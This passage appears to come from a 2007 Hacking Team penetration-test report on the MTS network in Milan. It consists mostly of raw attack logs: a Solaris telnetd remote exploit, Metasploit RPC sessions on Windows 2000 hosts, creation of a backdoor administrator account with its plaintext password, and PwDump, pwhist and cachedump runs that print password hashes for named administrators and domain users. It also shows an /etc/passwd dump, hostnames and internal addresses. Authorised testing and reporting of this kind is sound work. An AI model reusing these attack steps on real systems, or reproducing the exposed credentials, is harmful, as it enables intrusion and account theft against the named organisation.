All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
UID PID PPID C STIME TTY TIME CMD
root 0 0 0 May 17 ? 0:14 sched
root 1 0 0 May 17 ? 0:22 /sbin/init
root 2 0 0 May 17 ? 0:00 pageout
root 3 0 1 May 17 ? 1093:38 fsflush
daemon 229 1 0 May 17 ? 0:00 /usr/lib/nfs/lockd
root 7 1 0 May 17 ? 1:55 /lib/svc/bin/svc.startd
root 9 1 0 May 17 ? 2:13 /lib/svc/bin/svc.configd
root 239 1 0 May 17 ? 0:17 /usr/lib/utmpd
root 366 237 0 May 17 ? 0:00 /usr/sbin/rpc.metad
daemon 224 1 0 May 17 ? 0:00 /usr/sbin/rpcbind
root 237 1 0 May 17 ? 2:01 /usr/lib/inet/inetd start
root 104 1 0 May 17 ? 0:00 /usr/lib/sysevent/syseventd
daemon 227 1 0 May 17 ? 0:00 /usr/lib/nfs/statd
root 232 7 0 May 17 ? 0:04 /usr/lib/saf/sac -t 300
daemon 126 1 0 May 17 ? 18:21 /usr/lib/crypto/kcfd
root 121 1 0 May 17 ? 0:01 devfsadmd
root 111 1 0 May 17 ? 7:58 /usr/sbin/nscd
root 123 1 0 May 17 ? 0:00 /usr/lib/picl/picld
root 219 1 0 May 17 ? 0:02 /usr/sbin/cron
root 203 1 0 May 17 ? 11:40 /usr/lib/inet/xntpd
root 240 232 0 May 17 ? 0:04 /usr/lib/saf/ttymon
root 2040 7 0 May 17 console 0:00 /usr/lib/saf/ttymon -g -d
/dev/console -l console -T sun -m ldterm,ttcompat -h
root 351 1 0 May 17 ? 0:56 /usr/lib/ssh/sshd
todealte 7800 1 0 08:13:01 ? 0:00 /bin/bash ./todeal_start.sh
vas_perfmon
root 319 317 0 May 17 ? 0:39 /usr/lib/autofs/automountd
root 317 1 0 May 17 ? 0:00 /usr/lib/autofs/automountd
cpan 6027 6023 0 Jun 04 ? 0:03 /opt/MTSWeb/Apache/bin/httpd
-k start
noaccess 1693 1 0 May 17 ? 73:34
/usr/jdk/instances/jdk1.5.0/bin/java -server -XX:+BackgroundCompilation -Djava.
ftpd 4031 1 0 May 18 ? 3:03 /opt/proftpd/sbin/proftpd -c
/opt/proftpd/etc/proftpd.conf
bin 8611 8602 0 20:07:52 pts/1 0:00 bash
root 369 1 0 May 17 ? 1:50 /usr/lib/fm/fmd/fmd
smmsp 375 1 0 May 17 ? 0:18 /usr/lib/sendmail -Ac -q15m
root 342 1 0 May 17 ? 0:21 /usr/sbin/syslogd
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 199 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
todealpr 7791 7789 0 08:09:01 ? 16:05 java -Xmx512m -jar
../plugins/gate_mmf2/jars/gate_mmf2.jar -instance gate_mmf2
root 350 1 0 May 17 ? 0:00 /usr/sbin/mdmonitord
root 376 1 0 May 17 ? 4:10 /usr/lib/sendmail -bd -q15m
todealpr 7778 1 0 08:06:01 ? 0:00 /bin/bash ./todeal_start.sh
gate_cmf
todealte 7828 7826 0 08:25:00 ? 14:01 java -Xmx512m -jar
../plugins/vas_quoter_mmf2/jars/vas_quoter_mmf2.jar -instanc
root 1988 1 0 May 17 ? 0:00 /usr/sbin/vold -f
/etc/vold.conf
root 1869 1 0 May 17 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 1900 1 0 May 17 ? 0:00 /usr/lib/dmi/dmispd
root 1887 1 0 May 17 ? 0:02 /usr/lib/snmp/snmpdx -y -c
/etc/snmp/conf
root 1943 1 0 May 17 ? 1:55 /usr/sfw/sbin/snmpd
root 1902 1 0 May 17 ? 0:00 /usr/lib/dmi/snmpXdmid -s
militsunsrv1
cpan 6028 6023 0 Jun 04 ? 0:03 /opt/MTSWeb/Apache/bin/httpd
-k start
bin 8602 8599 0 20:03:47 pts/1 0:00 -sh
root 1963 237 0 Jul 14 ? 0:00 /usr/dt/bin/rpc.ttdbserverd
cpan 6025 6023 0 Jun 04 ? 0:03 /opt/MTSWeb/Apache/bin/httpd
-k start
todealpr 7789 1 0 08:09:01 ? 0:00 /bin/bash ./todeal_start.sh
gate_mmf2
nobody 1947 237 0 Jul 14 ? 0:00 /usr/openwin/bin/xfs
todealpr 7755 219 0 08:00:00 ? 0:00 sh -c
/home/todealprod/scripts/start_gw_core.sh >> /home/todealprod/logs/todeal
root 1965 1 0 Jul 14 ? 10:08 /usr/java/bin/java -Dviper
.fifo.path=/var/run/smc898/boot.fifo -Xmx128m -Dsun.s
todealte 7793 7792 0 08:10:01 ? 0:00 /usr/bin/bash
/home/todealtest/scripts/start_gw_core.sh
todealpr 7756 7755 0 08:00:01 ? 0:00 /usr/bin/bash
/home/todealprod/scripts/start_gw_core.sh
todealte 7818 7816 0 08:19:01 ? 13:26 java -Xmx512m -jar
../plugins/gate_mmf2/jars/gate_mmf2.jar -instance gate_mmf2
todealpr 7776 1 0 08:06:01 ? 0:00 /bin/bash ./todeal_start.sh
gate_mmf
root 1956 237 0 Jul 14 ? 0:00 /usr/sbin/rpc.metamhd
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 200 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
todealte 7826 1 0 08:25:00 ? 0:00 /bin/bash ./todeal_start.sh
vas_quoter_mmf2
root 1954 237 0 Jul 14 ? 0:00 /usr/sbin/rpc.metamedd
todealpr 7765 7763 0 08:03:01 ? 12:08 java -Xmx512m -jar
../plugins/vas_perfmon/jars/vas_perfmon.jar -instance vas_pe
todealpr 7781 7778 0 08:06:01 ? 41:12 java -Xmx512m -jar
../plugins/gate_cmf/jars/gate_cmf.jar -instance gate_cmf -co
todealte 7802 7800 0 08:13:01 ? 11:59 java -Xmx512m -jar
../plugins/vas_perfmon/jars/vas_perfmon.jar -instance vas_pe
todealte 7795 7793 0 08:10:01 ? 0:00 /bin/bash ./todeal_start.sh
todeal
cpan 6038 6023 0 Jun 04 ? 0:03 /opt/MTSWeb/Apache/bin/httpd
-k start
cpan 6024 6023 0 Jun 04 ? 0:03 /opt/MTSWeb/Apache/bin/httpd
-k start
cpan 6026 6023 0 Jun 04 ? 0:03 /opt/MTSWeb/Apache/bin/httpd
-k start
cpan 6037 6023 0 Jun 04 ? 0:03 /opt/MTSWeb/Apache/bin/httpd
-k start
root 6023 1 0 Jun 04 ? 4:53 /opt/MTSWeb/Apache/bin/httpd
-k start
cpan 6029 6023 0 Jun 04 ? 0:03 /opt/MTSWeb/Apache/bin/httpd
-k start
cpan 6039 6023 0 Jun 04 ? 0:03 /opt/MTSWeb/Apache/bin/httpd
-k start
todealpr 7758 7756 0 08:00:01 ? 0:00 /bin/bash ./todeal_start.sh
todeal
todealpr 7759 7758 0 08:00:01 ? 72:16 java -Xmx512m -jar
../jars/todeal.jar -instance todeal -config ../config/config
todealte 7796 7795 0 08:10:01 ? 32:54 java -Xmx512m -jar
../jars/todeal.jar -instance todeal -config ../config/config
todealpr 7780 7776 0 08:06:01 ? 12:21 java -Xmx512m -jar
../plugins/gate_mmf/jars/gate_mmf.jar -instance gate_mmf -co
todealte 7816 1 0 08:19:01 ? 0:00 /bin/bash ./todeal_start.sh
gate_mmf2
todealte 7792 219 0 08:10:01 ? 0:00 sh -c
/home/todealtest/scripts/start_gw_core.sh >> /home/todealtest/logs/todeal
bin 8617 8611 0 20:08:12 pts/1 0:00 ps -ef
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 201 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
todealpr 7763 1 0 08:03:01 ? 0:00 /bin/bash ./todeal_start.sh
vas_perfmon
cpan 6030 6023 0 Jun 04 ? 0:03 /opt/MTSWeb/Apache/bin/httpd
-k start
root 8599 237 0 20:03:47 ? 0:00 /usr/sbin/in.telnetd
bash-3.00$ cat passwd
root:x:0:0:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
smmsp:x:25:25:SendMail Message Submission Program:/:
listen:x:37:4:Network Admin:/usr/net/nls:
gdm:x:50:50:GDM Reserved UID:/:
webservd:x:80:80:WebServer Reserved UID:/:
nobody:x:60001:60001:NFS Anonymous Access User:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x NFS Anonymous Access User:/:
todealtest:x:101:100:ToDeal TEST Gateway
Administrator:/home/todealtest:/usr/bin/bash
todealprod:x:102:100:ToDeal PROD Gateway
Administrator:/home/todealprod:/usr/bin/bash
todealmaint:x:103:100:ToDeal MAINT Gateway
Administrator:/home/todealmaint:/usr/bin/bash
todealdr:x:104:100:ToDeal DR Gateway Administrator:/home/todealdr:/usr/bin/bash
tdmaint105:x:109:100:ToDeal MAINT (00105MTS) Gateway
Administrator:/home/tdmaint105:/usr/bin/bash
cpan:x:110:101:CPAN mirror:/home/cpan:/usr/bin/bash
ftpd:x:111:102::/home/ftpd:/bin/sh
nagios:x:112:1::/home/nagios:/bin/sh
nrpe:x:113:1::/home/nrpe:/bin/sh
todealst:x:114:100:ToDeal Stress Test Gateway
Administrator:/home/todealst:/usr/bin/bash
$ sh scan 100.100.200.14 daemon
SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope [email protected]
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 202 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Trying 100.100.200.14...
Connected to 100.100.200.14.
Escape character is '^]'.
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
$ id
uid=1(daemon) gid=1(other)
$
bash-3.00$ /sbin/ifconfig -a
lo0: flags=2001000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv4,VIRTUAL> mtu 8232 index
1
inet 127.0.0.1 netmask ff000000
hme0: flags=1000843<UP,BROADCAST,RUNNING,MULTICAST,IPv4> mtu 1500 index 2
inet 100.100.200.14 netmask ffffff00 broadcast 100.100.200.255
bash-3.00$ hostname
militsunsrv1
bash-3.00$ id
uid=1(daemon) gid=1(other)
bash-3.00$ /usr/bin/isainfo -kv
64-bit sparcv9 kernel modules
bash-3.00$ isainfo -v
64-bit sparcv9 applications
vis
32-bit sparc applications
vis v8plus div32 mul32
bash-3.00$ isainfo -x
sparcv9: vis
sparc: vis v8plus div32 mul32
bash-3.00$ cat /etc/release
Solaris 10 6/06 s10s_u2wos_09a SPARC
Copyright 2006 Sun Microsystems, Inc. All Rights Reserved.
Use is subject to license terms.
Assembled 09 June 2006
6.6.4 100.100.200.21 [Compromised]
Rating: compromised
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 203 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Vulnerabilities found: V5
Risk state: High
Skill level required to exploit the vulnerability: Low
Solution: Install all OS updates
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Microsoft Windows Version Windows 2000
Hostname RSD4-9-3-0TS5-1 REUTERS
Compromi
sed
Compromised Directly Info Microsoft RPC
Auth MTSWriter:t3-st.st.4n-ge
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
9535/tcp open man?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
An outdated version of Windows 2000 contains a critical vulnerability in the RPC service allowing
remote users to gain SYSTEM access:
msf > sessions -i 2
[*] Starting interaction with 2...
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>VOL
VOL
Volume in drive C has no label.
Volume Serial Number is 0CBC-35CE
C:\WINNT\system32>ipconfig
ipconfig
Windows 2000 IP Configuration
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 204 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Ethernet adapter MTS Milan LAN:
Connection-specific DNS Suffix . : mtsgroup.org
IP Address. . . . . . . . . . . . : 100.100.200.21
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 100.100.200.254
C:\WINNT\system32>net user /ADD MTSWriter t3-st.st.4n-ge
net user /ADD MTSWriter t3-st.st.4n-ge
The command completed successfully.
C:\WINNT\system32>net localgroup administrators /add MTSWriter
net localgroup administrators /add MTSWriter
The command completed successfully.
C:\dell>PwDump.exe 127.0.0.1
PwDump.exe 127.0.0.1
Current directory for pwdump is C:\dell
Using pipe {0AC9E786-FB32-41DF-9E8C-E04511CE36B2}
Key length is 16
Administrator:500:NO
PASSWORD*********************:46FE7B353F944049F4263A1DF934F201:::
cba_anonymous:1002:NO
PASSWORD*********************:B27602BE023C2A53818D7F91126305CA:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
MTSWriter:1003:19FB4918FC87D8B37A8136F95E7B19C9:A9DA2A499B194C6606F345744C318AAE
:::
Completed.
pwdump6 Version 1.6.0 by fizzgig and the mighty group at foofus.net
Copyright 2007 foofus.net
This program is free software under the GNU
General Public License Version 2 (GNU GPL), you can redistribute it and/or
modify it under the terms of the GNU GPL, as published by the Free Software
Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS
PROGRAM. Please see the COPYING file included with this program
and the GNU GPL for further details.
C:\dell>pwhist.exe
pwhist.exe
pwhist v0.96b, (C)2003 [email protected]
----------------------------------------
Administrator(current):500:aad3b435b51404eeaad3b435b51404ee:46fe7b353f944049f426
3a1df934f201:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 205 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
cba_anonymous(current):1002:aad3b435b51404eeaad3b435b51404ee:b27602be023c2a53818
d7f91126305ca:::
cba_anonymous(hist_01):1002:aad3b435b51404eeaad3b435b51404ee:b27602be023c2a53818
d7f91126305ca:::
Guest(current):501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c0
89c0:::
MTSWriter(current):1003:19fb4918fc87d8b37a8136f95e7b19c9:a9da2a499b194c6606f3457
44c318aae:::
MTSWriter(hist_01):1003:19fb4918fc87d8b37a8136f95e7b19c9:a9da2a499b194c6606f3457
44c318aae:::
C:\dell>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0CBC-35CE
Directory of C:\dell
20/07/2007 07.02 <DIR> .
20/07/2007 07.02 <DIR> ..
20/07/2007 08.45 49.152 cachedump.exe
20/07/2007 05.07 114.735 cryptcat.exe
09/05/2006 09.00 <DIR> Drivers
20/07/2007 08.45 552.960 fgdump.exe
20/07/2007 08.46 49.152 fgexec.exe
07/06/2007 12.56 32.768 imokav.exe
07/06/2007 12.56 49.152 lstarget.dll
20/07/2007 08.46 57.344 pstgdump.exe
21/06/2007 13.14 192.512 PwDump.exe
20/02/2004 15.10 65.536 pwhist.exe
9 File(s) 1.163.311 bytes
3 Dir(s) 15.812.775.936 bytes free
C:\dell>cachedump.exe
cachedump.exe
mbiazzo:71D872994EAC4DC101DF2E1B0955ABA7:mtsgroup:
reuters:2E10C73CB241107F8D7E687874291573:mtsgroup:
lmeneghesso:F31D02B84793B4790BED20FF2E2FAD4F:mtsgroup:
C:\dell>fgdump.exe
fgdump.exe
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 206 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
6.6.5 100.100.200.73 [Compromised]
Rating: compromised
Vulnerabilities found: V5
Risk state: High
Skill level required to exploit the vulnerability: Low
Solution: Install all OS updates
Discovery method Missed Initial scan, Hidden on Second scan
Availability Daylight (Workstation/Notebook)
Class Workstation
Vendor/OS Microsoft Windows Version Not detected
Hostname Not detected
Compromised Compromised Directly Info Microsoft RPC
Auth MTSWriter:t3-st.st.4n-ge
On this IP there is an alive host in hidden mode.
An outdated version of Windows 2000 contains a critical vulnerability in the RPC service allowing
remote users to gain SYSTEM access:
msf > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>ipconfig
ipconfig
Windows 2000 IP Configuration
Ethernet adapter MTS Milan LAN:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 100.100.200.73
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 100.100.200.254
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is F0CA-A516
Directory of C:\
02/25/2003 03:48p 192 boot.diy
04/27/2005 04:14p <DIR> Documentation
06/18/2007 02:46p <DIR> Documents and Settings
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 207 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
10/22/2004 04:21p <DIR> Fabio
04/07/2004 12:24p 1,102 INSTALL.LOG
07/17/2007 12:28p <DIR> Mirko-tmp
06/30/2006 05:20p <DIR> MTSnet
02/10/2005 02:11p <DIR> namtest
05/31/2007 02:06p 217,271 O2.jpg
05/31/2007 02:07p 198,939 O3.jpg
05/31/2007 02:08p 244,452 O7.jpg
05/31/2007 02:09p 230,372 O8.jpg
08/30/2004 09:31a <DIR> Pictures4cover
06/18/2007 02:47p <DIR> Program Files
01/07/2005 10:14a 309 push.log
10/12/2004 01:07p <DIR> Scanner
09/08/2006 04:53p <DIR> TEMP
05/24/2001 12:59p 162,304 UNWISE.EXE
07/08/2005 06:32p <DIR> VPN Client 4.0.60
07/10/2007 07:47p <DIR> WINNT
08/27/2004 12:31p <DIR> WUTemp
8 File(s) 1,054,941 bytes
13 Dir(s) 4,376,186,880 bytes free
C:\Fabio>dir
dir
Volume in drive C has no label.
Volume Serial Number is F0CA-A516
Directory of C:\Fabio
10/22/2004 04:21p <DIR> .
10/22/2004 04:21p <DIR> ..
10/21/2004 12:47p 155,293,852 millenium_aggiornamento.nrg
10/22/2004 04:18p 627,419,292 office2000ita.nrg
2 File(s) 782,713,144 bytes
2 Dir(s) 4,376,186,880 bytes free
C:\VPN Client 4.0.60>dir
dir
Volume in drive C has no label.
Volume Serial Number is F0CA-A516
Directory of C:\VPN Client 4.0.60
07/08/2005 06:32p <DIR> .
07/08/2005 06:32p <DIR> ..
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 208 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
09/30/2003 01:15p 832,356 10-INFRA-0002 - Access Network Client
cook book.pdf
08/27/2004 10:31a 45,129 DelayInst.exe
08/27/2004 10:34a 143,360 installservice.exe
08/27/2004 10:39a 1,708,856 instmsi.exe
08/27/2004 10:39a 1,822,520 instmsiw.exe
08/27/2004 10:40a 1,613 sig.dat
11/17/2004 05:53p 10,182,656 vpnclient-darwin-4.6.00.0045-GUI-k9.dmg
11/17/2004 05:53p 1,406,359 vpnclient-linux-4.6.00.0045-k9.tar.gz
11/17/2004 05:53p 2,788,201 vpnclient-solaris-4.6.00.0045-k9.tar.Z
11/17/2004 05:53p 10,471,936 vpnclient-win-msi-4.6.00.0049-k9.exe
08/27/2004 10:39a 51,200 vpnclient_fc.mst
08/27/2004 10:16a 41,984 vpnclient_help_fc.mst
08/27/2004 10:16a 135,863 vpnclient_help_fc_WISETRFM_13.cab
08/27/2004 10:16a 24,064 vpnclient_help_jp.mst
08/27/2004 10:16a 97,461 vpnclient_help_jp_WISETRFM_10.cab
08/27/2004 10:40a 49,152 vpnclient_jp.mst
08/27/2004 10:39a 50,176 vpnclient_setup.exe
08/27/2004 10:40a 1,024 vpnclient_setup.ini
08/27/2004 10:39a 8,221,184 vpnclient_setup.msi
19 File(s) 38,075,094 bytes
2 Dir(s) 4,376,186,880 bytes free
C:\>cd MTSnet
cd MTSnet
C:\MTSnet>dir
dir
Volume in drive C has no label.
Volume Serial Number is F0CA-A516
Directory of C:\MTSnet
06/30/2006 05:20p <DIR> .
06/30/2006 05:20p <DIR> ..
06/30/2006 05:26p <DIR> BondVision ADT [LIVE]
06/30/2006 05:21p <DIR> BondVision ADT [TEST]
06/30/2006 05:19p <DIR> Cert
06/30/2006 05:26p <DIR> MMC5_live
06/30/2006 05:48p <DIR> MMC5_test
0 File(s) 0 bytes
7 Dir(s) 4,376,186,880 bytes free
C:\MTSnet>cd Cert
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 209 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
cd Cert
C:\MTSnet\Cert>dir
dir
Volume in drive C has no label.
Volume Serial Number is F0CA-A516
Directory of C:\MTSnet\Cert
06/30/2006 05:19p <DIR> .
06/30/2006 05:19p <DIR> ..
09/08/2003 04:53p 866 cert.cer
1 File(s) 866 bytes
2 Dir(s) 4,376,186,880 bytes free
C:\MTSnet\Cert>type cert.cer
type cert.cer
-----BEGIN CERTIFICATE-----
MIICSjCCAbMCBD9cpcowDQYJKoZIhvcNAQEEBQAwbDELMAkGA1UEBhMCSVQxDjAMBgNVBAgTBUlU
TEFZMQ4wDAYDVQQHEwVNSUxBTjETMBEGA1UEChMKTVRTIFMucC5BLjETMBEGA1UECxMKTVRTIFMu
cC5BLjETMBEGA1UEAxMKTVRTIFMucC5BLjAeFw0wMzA5MDgxNTUyNDJaFw0xMzA5MDUxNTUyNDJa
MGwxCzAJBgNVBAYTAklUMQ4wDAYDVQQIEwVJVExBWTEOMAwGA1UEBxMFTUlMQU4xEzARBgNVBAoT
Ck1UUyBTLnAuQS4xEzARBgNVBAsTCk1UUyBTLnAuQS4xEzARBgNVBAMTCk1UUyBTLnAuQS4wgZ8w
DQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAL2c8DNJJVWc8hH9rfSIaITIyYO671pLNJP2j66FNH5i
1J7VJxxzrZp5XsaO3qJgcvdSYbtwPyoE+Ye+tgWuGfT5wnH/VeQUUeu61g6ROEEnpYGE4FKExhV0
E69h+pE5QDdAalqpZ251/zaa2EKOPBoCzf3Fc8Hc1dcWg2unOY9rAgMBAAEwDQYJKoZIhvcNAQEE
BQADgYEAAitNMsJhJ+7wAtkq7VJOj117WuVAo9SOSeOYgyr4YfNnd7IArJ7nN+wSRKQRAOa06wdH
Br0FoCoXVy+wdQ8Xi/zHhsDNa74ALJDkSkg5T4xyhiOrovlOIJ9wE2JD+oLUAFXEVwtcsCiRmfqN
AJIxElcOFKGCFiiQnGgX2WwaYKk=
-----END CERTIFICATE-----
C:\MTSnet\Cert>
C:\MTSnet\BondVision ADT [LIVE]>dir
Volume in drive C has no label.
Volume Serial Number is F0CA-A516
Directory of C:\MTSnet\BondVision ADT [LIVE]
06/30/2006 05:26p <DIR> .
06/30/2006 05:26p <DIR> ..
06/29/2006 12:21p 266,240 ADT_Dummy_Trade_Engine.exe
06/16/2006 01:45p 135,168 ADT_Request_Builder.exe
03/20/2006 01:17p 129 dirs.cfg
06/30/2006 05:20p <DIR> Ini
06/30/2006 05:20p <DIR> Logs
06/30/2006 05:27p <DIR> Reports
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 210 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
05/05/2006 02:18p 37,888 template.xls
06/30/2006 05:20p 3,386 unins000.dat
06/30/2006 05:20p 667,914 unins000.exe
06/30/2006 05:20p <DIR> XML
6 File(s) 1,110,725 bytes
6 Dir(s) 4,376,186,880 bytes free
C:\MTSnet\BondVision ADT [LIVE]\Ini>dir
dir
Volume in drive C has no label.
Volume Serial Number is F0CA-A516
Directory of C:\MTSnet\BondVision ADT [LIVE]\Ini
06/30/2006 05:20p <DIR> .
06/30/2006 05:20p <DIR> ..
06/30/2006 05:24p 123 adtconfig.ini
1 File(s) 123 bytes
2 Dir(s) 4,376,186,880 bytes free
C:\MTSnet\BondVision ADT [LIVE]\Ini>type adtconfig.ini
type adtconfig.ini
[BuilderLogon]
Auto=0
[EngineLogon]
Auto=1
[Logout]
Auto=0
Time=
[Cred]
UserName=¡¡y~
Password=
C:\MTSnet\BondVision ADT [TEST]\Ini>dir
dir
Volume in drive C has no label.
Volume Serial Number is F0CA-A516
Directory of C:\MTSnet\BondVision ADT [TEST]\Ini
06/30/2006 05:20p <DIR> .
06/30/2006 05:20p <DIR> ..
05/18/2006 12:17p 108 adtconfig.ini
1 File(s) 108 bytes
2 Dir(s) 4,376,186,880 bytes free
C:\MTSnet\BondVision ADT [TEST]\Ini>type adtconfig.ini
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 211 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
type adtconfig.ini
[BuilderLogon]
Auto=0
[EngineLogon]
Auto=0
[Logout]
Auto=0
Time=
[Cred]
UserName=
Password=
C:\Documents and Settings>dir
Volume in drive C has no label.
Volume Serial Number is F0CA-A516
Directory of C:\Documents and Settings
06/18/2007 02:46p <DIR> .
06/18/2007 02:46p <DIR> ..
08/27/2004 12:27p <DIR> Administrator
10/12/2004 05:36p <DIR> Administrator.MTSGROUP
12/04/2006 08:13p <DIR> All Users
06/29/2006 10:39a <DIR> bvhelpdesk
06/18/2007 02:47p <DIR> LGrandini_a
10/13/2006 04:12p <DIR> mbiazzo
01/20/2006 05:51p <DIR> mbiazzo_A
10/21/2004 12:53p <DIR> Pcwriter
07/19/2006 01:30p <DIR> sborghesio
0 File(s) 0 bytes
11 Dir(s) 4,376,186,880 bytes free
C:\>net user /ADD MTSWriter t3-st.st.4n-ge
net user /ADD MTSWriter t3-st.st.4n-ge
The command completed successfully.
C:\>net localgroup administrators /add MTSWriter
net localgroup administrators /add MTSWriter
The command completed successfully.
C:\WUTemp>dir
dir
Volume in drive C has no label.
Volume Serial Number is F0CA-A516
Directory of C:\WUTemp
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 212 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
07/20/2007 02:53a <DIR> .
07/20/2007 02:53a <DIR> ..
06/07/2007 12:56p 32,768 imokav.exe
06/07/2007 12:56p 49,152 lstarget.dll
06/21/2007 01:14p 192,512 PwDump.exe
3 File(s) 274,432 bytes
2 Dir(s) 4,375,896,064 bytes free
C:\WUTemp>PwDump.exe 127.0.0.1
PwDump.exe 127.0.0.1
Current directory for pwdump is C:\WUTemp
Using pipe {9968AB66-CD6F-4E4B-B855-81F89BC39B0C}
Key length is 16
Administrator:500:NO
PASSWORD*********************:46FE7B353F944049F4263A1DF934F201:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
MTSWriter:1009:19FB4918FC87D8B37A8136F95E7B19C9:A9DA2A499B194C6606F345744C318AAE
:::
PCWriter:1000:FA31E67228189222EC44577791D1BB4F:391155DAD0D5C614EB7F4E208297A7FE:
::
PCWriter_history_0:1000:799272B2884C5FC5AAD3B435B51404EE:842B7EBFC4DD4DDEEB5C799
BA554FDBD:::
Completed.
pwdump6 Version 1.6.0 by fizzgig and the mighty group at foofus.net
Copyright 2007 foofus.net
This program is free software under the GNU
General Public License Version 2 (GNU GPL), you can redistribute it and/or
modify it under the terms of the GNU GPL, as published by the Free Software
Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS
PROGRAM. Please see the COPYING file included with this program
and the GNU GPL for further details.
C:\WUTemp>pwhist.exe
pwhist.exe
pwhist v0.96b, (C)2003 [email protected]
----------------------------------------
Administrator(current):500:aad3b435b51404eeaad3b435b51404ee:46fe7b353f944049f426
3a1df934f201:::
